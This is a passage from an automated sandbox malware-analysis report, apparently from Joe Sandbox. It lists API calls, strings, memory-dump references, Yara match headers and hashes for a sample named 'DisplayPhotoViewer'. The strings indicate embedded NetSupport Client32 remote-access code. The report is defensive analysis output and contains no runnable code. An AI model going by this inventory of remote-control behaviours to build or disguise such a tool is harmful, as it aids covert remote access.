                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Class$AtomBringCreateErrorExitForegroundGlobalInfoLastMessageObjectProcessRegisterShowStockwsprintf
                                                                                                    • String ID: LockImage$NSMDisplayImageClass$UI.CPP$hWnd
                                                                                                    • API String ID: 2874459511-2435945906
                                                                                                    • Opcode ID: 14f5e18bd7484c0c3277a19061c1c8775e95c2a43ed54eced4202a8697d867af
                                                                                                    • Instruction ID: 8ae18fdab4263ecfa175705d9016d1ab0ac37dc4f0c8cee6f90c9ab3c6ce5bb2
                                                                                                    • Opcode Fuzzy Hash: 14f5e18bd7484c0c3277a19061c1c8775e95c2a43ed54eced4202a8697d867af
                                                                                                    • Instruction Fuzzy Hash: 185170B5E00215AFDB11DFE5DC84BAEFBB4FB88718F104129E915A7284EB306900CB55
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1105D87A
  • Part of subcall function 1105D260: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1105D29C
  • Part of subcall function 1105D260: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 1105D2F4
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 1105D8CB
• RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 1105D985
• RegCloseKey.ADVAPI32(?), ref: 1105D9A1
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Enum$Open$CloseValue
• String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
• API String ID: 2823542970-1528906934
• Opcode ID: 089ad50b7823bc75e90b5af304963e730fe0f07c047281062b9ca18221d0e202
• Instruction ID: 410c9791a0c30090d6956da2cfe7ff6cc9ab5f05d0b384aabeb732b1c9aa4562
• Opcode Fuzzy Hash: 089ad50b7823bc75e90b5af304963e730fe0f07c047281062b9ca18221d0e202
• Instruction Fuzzy Hash: 03419374E4021D6BDB61CF51CD81FEEF7B8EB55708F004199EA48A7140DAB0AE81CFA1
APIs
• SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 110238A6
• SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 110238B9
• SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 110238CA
• SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 110238D5
• SendMessageA.USER32(?,000000C4,-00000001,?), ref: 110238EE
• GetDC.USER32(?), ref: 110238F5
• SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11023905
• SelectObject.GDI32(?,00000000), ref: 11023912
• GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 11023928
• SelectObject.GDI32(?,?), ref: 11023937
• ReleaseDC.USER32(?,?), ref: 1102393F
• SetCaretPos.USER32(?,?), ref: 11023981
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
• String ID:
• API String ID: 4100900918-3916222277
• Opcode ID: 0bfd7c62f44634c1011658b6cb37f24d3deba47e954608c248f427f598067532
• Instruction ID: 582f7d2b3bab31338bd8b7c345a81470e1a80dc91065d5da42324728f4e3bf95
• Opcode Fuzzy Hash: 0bfd7c62f44634c1011658b6cb37f24d3deba47e954608c248f427f598067532
• Instruction Fuzzy Hash: D9411F75A11318AFEB10DFA9C885FAEFBFDEF89700F518119E915AB284D6709901CB60
APIs
• InterlockedIncrement.KERNEL32(111DEC80), ref: 111554C8
• CreateCompatibleDC.GDI32(00000000), ref: 111554DC
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 1115550B
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 11155517
• GetSystemPaletteEntries.GDI32(00000000,00000000,00000000,-00000004), ref: 1115556B
• _memmove.LIBCMT ref: 111555BE
• _calloc.LIBCMT ref: 111555CC
• DeleteDC.GDI32(00000000), ref: 111555F3
  • Part of subcall function 11155410: CreateCompatibleDC.GDI32(00000000), ref: 11155414
  • Part of subcall function 11155410: GetDeviceCaps.GDI32(00000000,0000000E), ref: 1115543D
  • Part of subcall function 11155410: GetDeviceCaps.GDI32(00000000,0000000C), ref: 11155447
  • Part of subcall function 11155410: CreatePalette.GDI32(111DEC88), ref: 1115549E
  • Part of subcall function 11155410: DeleteDC.GDI32(00000000), ref: 111554AA
• DeleteDC.GDI32(00000000), ref: 11155612
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Palette$CreateDelete$CapsCompatibleDeviceSelect$EntriesErrorExitIncrementInterlockedLastMessageProcessSystem_calloc_memmovewsprintf
• String ID: ..\ctl32\WPALETTE.C$gPD.palsize == 256$hdc$idata->remote_paltrans
• API String ID: 3281528250-101977019
• Opcode ID: 74de6f36a7a00ea8dcb63e53077c38aacdb9e5e6e9b6a871b72f12bb6266f35d
• Instruction ID: e2fed4c79443497c99abdac597549d0a8a2d12804970561647682f74472fa4c7
• Opcode Fuzzy Hash: 74de6f36a7a00ea8dcb63e53077c38aacdb9e5e6e9b6a871b72f12bb6266f35d
• Instruction Fuzzy Hash: C831F475A017117BF6E09B79EC85F5BF778AB4271DF004038FA25E6285EB76B00087A6
APIs
• CapiHangup.PCICAPI(00000000,10702D88), ref: 10702E90
• WaitForSingleObject.KERNEL32(00000000,00002710,00000000,10702D88), ref: 10702EA0
• CloseHandle.KERNEL32(00000000), ref: 10702EDA
• EnterCriticalSection.KERNEL32(10718A40), ref: 10702EE1
• LeaveCriticalSection.KERNEL32(10718A40), ref: 10702EF8
• CloseHandle.KERNEL32(00000000), ref: 10702F0F
• CloseHandle.KERNEL32(?), ref: 10702F18
• DeleteCriticalSection.KERNEL32(10718A40,00000000,10702D88), ref: 10702F25
• DeleteCriticalSection.KERNEL32(107189C0), ref: 10702F2C
• FreeLibrary.KERNEL32(?), ref: 10702F34
Strings
• Could not stop CAPI GetMsgThread, xrefs: 10702EAD
• !"Could not stop CAPI GetMsgThread", xrefs: 10702EC0
• E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C, xrefs: 10702EBB
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: CriticalSection$CloseHandle$Delete$CapiEnterFreeHangupLeaveLibraryObjectSingleWait
• String ID: !"Could not stop CAPI GetMsgThread"$Could not stop CAPI GetMsgThread$E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C
• API String ID: 2720042353-491019462
• Opcode ID: 4934f6310de586fac9f9907a1f8582dfddbdad2fc33b9cb735650272e8bbc100
• Instruction ID: a66dd59e46a3f24dd24a636aba9cf80a5c87f5230636b531084ecb34b10e4d66
• Opcode Fuzzy Hash: 4934f6310de586fac9f9907a1f8582dfddbdad2fc33b9cb735650272e8bbc100
• Instruction Fuzzy Hash: 8C1130757002259BDB809BA4DCC9F5637A9FB0D380F48C505F901C72E4CBB4E882CB68
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD62D
                                                                                                    • EnterCriticalSection.KERNEL32(111E41A4,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD636
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD63C
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD66E
                                                                                                    • LeaveCriticalSection.KERNEL32(111E41A4,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD677
                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD698
                                                                                                    • WriteFile.KERNEL32(00000000,11181663,?,?,00000000,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF), ref: 110FD6B0
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD6BD
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD6CC
                                                                                                    • LeaveCriticalSection.KERNEL32(111E41A4,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD6D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
• String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
• API String ID: 831250470-625438208
APIs
• CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11055239
• CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1105524A
• DeleteObject.GDI32(?), ref: 1105525B
• PostMessageA.USER32(0006029E,00000800,00000000,00000000), ref: 110552C6
• GetCursorPos.USER32(?), ref: 110552FD
  • Part of subcall function 11053B90: GetTickCount.KERNEL32 ref: 11053C06
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004C), ref: 11090E7E
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004D), ref: 11090E87
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004E), ref: 11090E8E
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000000), ref: 11090E97
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004F), ref: 11090E9D
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000001), ref: 11090EA5
• GetDC.USER32(00000000), ref: 110552CE
• GetPixel.GDI32(00000000,00000000,00000000), ref: 110552DB
• SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 110552E7
• ReleaseDC.USER32(00000000,00000000), ref: 110552F0
• GetSystemMetrics.USER32(0000004C), ref: 1105533B
• GetSystemMetrics.USER32(0000004D), ref: 11055341
• GetTickCount.KERNEL32 ref: 110553AD
• _free.LIBCMT ref: 11055430
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: MetricsSystem$CountPixelTick$CombineCreateCursorDeleteMessageObjectPostRectRelease_free
• String ID:
• API String ID: 4025550384-0
APIs
• GetSysColor.USER32(00000004), ref: 110039E4
  • Part of subcall function 111388D0: SetBkColor.GDI32(?,00000000), ref: 111388E4
  • Part of subcall function 111388D0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111388F9
  • Part of subcall function 111388D0: SetBkColor.GDI32(?,00000000), ref: 11138901
• InflateRect.USER32(?,000000FF,000000FF), ref: 110039FF
• GetSysColor.USER32(00000010), ref: 11003A12
• GetSysColor.USER32(00000010), ref: 11003A29
• GetSysColor.USER32(00000014), ref: 11003A40
• GetSysColor.USER32(00000014), ref: 11003A57
• GetSysColor.USER32(00000014), ref: 11003A74
• GetSysColor.USER32(00000014), ref: 11003A8B
• GetSysColor.USER32(00000010), ref: 11003AA2
• GetSysColor.USER32(00000010), ref: 11003AB9
• GetSysColor.USER32(00000004), ref: 11003AD0
• SetBkColor.GDI32(?,00000000), ref: 11003AD7
• InflateRect.USER32(?,000000FE,000000FD), ref: 11003AE5
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: Color$InflateRect$Text
• String ID:
• API String ID: 657964945-0
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: _memset
• String ID: @$DoRegisterUser$Error. Failed to get username for Register, e=%d$Info. No logged on user for Register$Login name %s$P$StudentRegister
• API String ID: 2102423945-4086722448
APIs
  • Part of subcall function 1113B380: GetVersionExA.KERNEL32(111E4A50,75BF8400), ref: 1113B3B0
  • Part of subcall function 1113B380: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1113B3EF
  • Part of subcall function 1113B380: _memset.LIBCMT ref: 1113B40D
  • Part of subcall function 1113B380: _strncpy.LIBCMT ref: 1113B4CF
  • Part of subcall function 1113B380: RegCloseKey.ADVAPI32(00000000), ref: 1113B4DF
  • Part of subcall function 11040E90: _memset.LIBCMT ref: 11040ED6
  • Part of subcall function 11040E90: RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000100), ref: 11040F1D
  • Part of subcall function 11040E90: _strncmp.LIBCMT ref: 11040F3E
  • Part of subcall function 11040E90: RegEnumKeyA.ADVAPI32(00000000,00000001,?,00000100), ref: 11040F59
  • Part of subcall function 11040E90: RegCloseKey.ADVAPI32(00000000), ref: 11040F60
  • Part of subcall function 110C9870: __strdup.LIBCMT ref: 110C988A
  • Part of subcall function 1113AEB0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
  • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
  • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
  • Part of subcall function 110C9920: _free.LIBCMT ref: 110C994D
• GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00000000,?,?,00000000,1119253C), ref: 11041462
• GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00000000,?,?,00000000,1119253C), ref: 1104147A
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,1119253C), ref: 11041482
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: Close$EnumFolderInformationPathToken_memset$FileHandleModuleNameOpenVersion__strdup_free_strncmp_strncpy
• String ID: -c"%s"$ -h%s$ -o"%s"$ -r"%s"$ -t"%s"$ActApp Execute String : %s : result %d (0 == SUCCEEDED)$ActApp.exe" $Preparing ActApp Execute String...
• API String ID: 126255663-1659588059
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: wsprintf
• String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
• API String ID: 2111968516-2092292787
                                                                                                    • Opcode ID: 4337d410728c3176549b811a5f318792d40639d9d30e7bcad79d1ececddff2fb
                                                                                                    • Instruction ID: 6c1908b0b5acbbd227155ae47bf31b6bbe93f1d1caf817c5e4e7dc0828dd844a
                                                                                                    • Opcode Fuzzy Hash: 4337d410728c3176549b811a5f318792d40639d9d30e7bcad79d1ececddff2fb
                                                                                                    • Instruction Fuzzy Hash: 71F06C3BB8810C57A90186EC744147CF78D67C012D78ED092F58CEBF00E92ADDA0AB99
                                                                                                    APIs
                                                                                                    • EnableWindow.USER32(00000000,?), ref: 1101D0FE
                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 1101D138
                                                                                                    • DeleteObject.GDI32(?), ref: 1101D183
                                                                                                    • SetTimer.USER32(00000000,00000001,000002EE,00000000), ref: 1101D27C
                                                                                                    • SetWindowTextA.USER32(00000000,00000000), ref: 1101D245
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$DeleteEnableErrorExitInvalidateLastMessageObjectProcessRectTextTimerwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2329730260-1557312927
                                                                                                    • Opcode ID: f503b32cad4e17b2163d0d32ebd53a037ac5b57c10b4840c3cb5314882a9e559
                                                                                                    • Instruction ID: fa383a0444934d2cc6844facc7ea1457e75435e91d3bcc38e019577a6b5836ac
                                                                                                    • Opcode Fuzzy Hash: f503b32cad4e17b2163d0d32ebd53a037ac5b57c10b4840c3cb5314882a9e559
                                                                                                    • Instruction Fuzzy Hash: 70917D78B00605AFD310DF65DC94F96B3F6BF98318F1086A8EA5A4B295D771F881CB81
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000002,?,00000000,00000000,00000000), ref: 1104948B
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Value__wcstoi64
                                                                                                    • String ID: %s|%s|$Client$DisableReconnect$MacAddress$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                                                                    • API String ID: 2540774538-4016704742
                                                                                                    • Opcode ID: 2e423f4a9e94a2f4796faae418cecff11e5309db5b4d10d90f8677407e7ed056
                                                                                                    • Instruction ID: decd29bba0695e89a2399ee3a937058bad728b4f7561fb74319676153b72d9f3
                                                                                                    • Opcode Fuzzy Hash: 2e423f4a9e94a2f4796faae418cecff11e5309db5b4d10d90f8677407e7ed056
                                                                                                    • Instruction Fuzzy Hash: CF7193B5E10205AFDB54CFA4CCC5FAEF7B9EB49714F24456DE925A7280EA31B900CB60
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32(111E12A8,218EC38C,1110715D,00000000,00000000,00000000,E8111A9F,11177AA3,000000FF,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000), ref: 110718DE
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • InitializeCriticalSection.KERNEL32(0000000C,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000,1117F3B8,000000FF), ref: 11071947
                                                                                                    • InitializeCriticalSection.KERNEL32(00000024,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000,1117F3B8,000000FF), ref: 1107194D
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 11071957
                                                                                                    • InitializeCriticalSection.KERNEL32(000004C8,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 110719AC
                                                                                                    • InitializeCriticalSection.KERNEL32(000004F0,?,1110681D,0003533B,E0680D75,E8111A9F,00000001,00000000,218EC38C,00000000,00000001,00000000,00000000), ref: 110719B5
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection$CreateEvent__wcstoi64
                                                                                                    • String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
                                                                                                    • API String ID: 4263422321-2298398812
                                                                                                    • Opcode ID: fab30e78341cd134c0767804648c31141ef37f3aa6108be01e73b9727e08f68a
                                                                                                    • Instruction ID: 0089207d2e7d9da25254d1d5d3c0e63d3f288bed5d4fbdc6d3593f91d587987d
                                                                                                    • Opcode Fuzzy Hash: fab30e78341cd134c0767804648c31141ef37f3aa6108be01e73b9727e08f68a
                                                                                                    • Instruction Fuzzy Hash: C751DFB1A00645AFDB11CF65CC80B9ABBE9FF84308F0485AAED599F285D771A500CFA0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • SETOPTICALDRIVEACCESS, xrefs: 1103B6B4
                                                                                                    • SETUSBMASSSTORAGEACCESS, xrefs: 1103B683
                                                                                                    • IsA(), xrefs: 1103B724
                                                                                                    • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103B702
                                                                                                    • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103B6CF
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1103B71F
                                                                                                    • BLOCKPRINTING, xrefs: 1103B6DD
                                                                                                    • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103B6A6
                                                                                                    • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103B6FB
                                                                                                    Yara matches
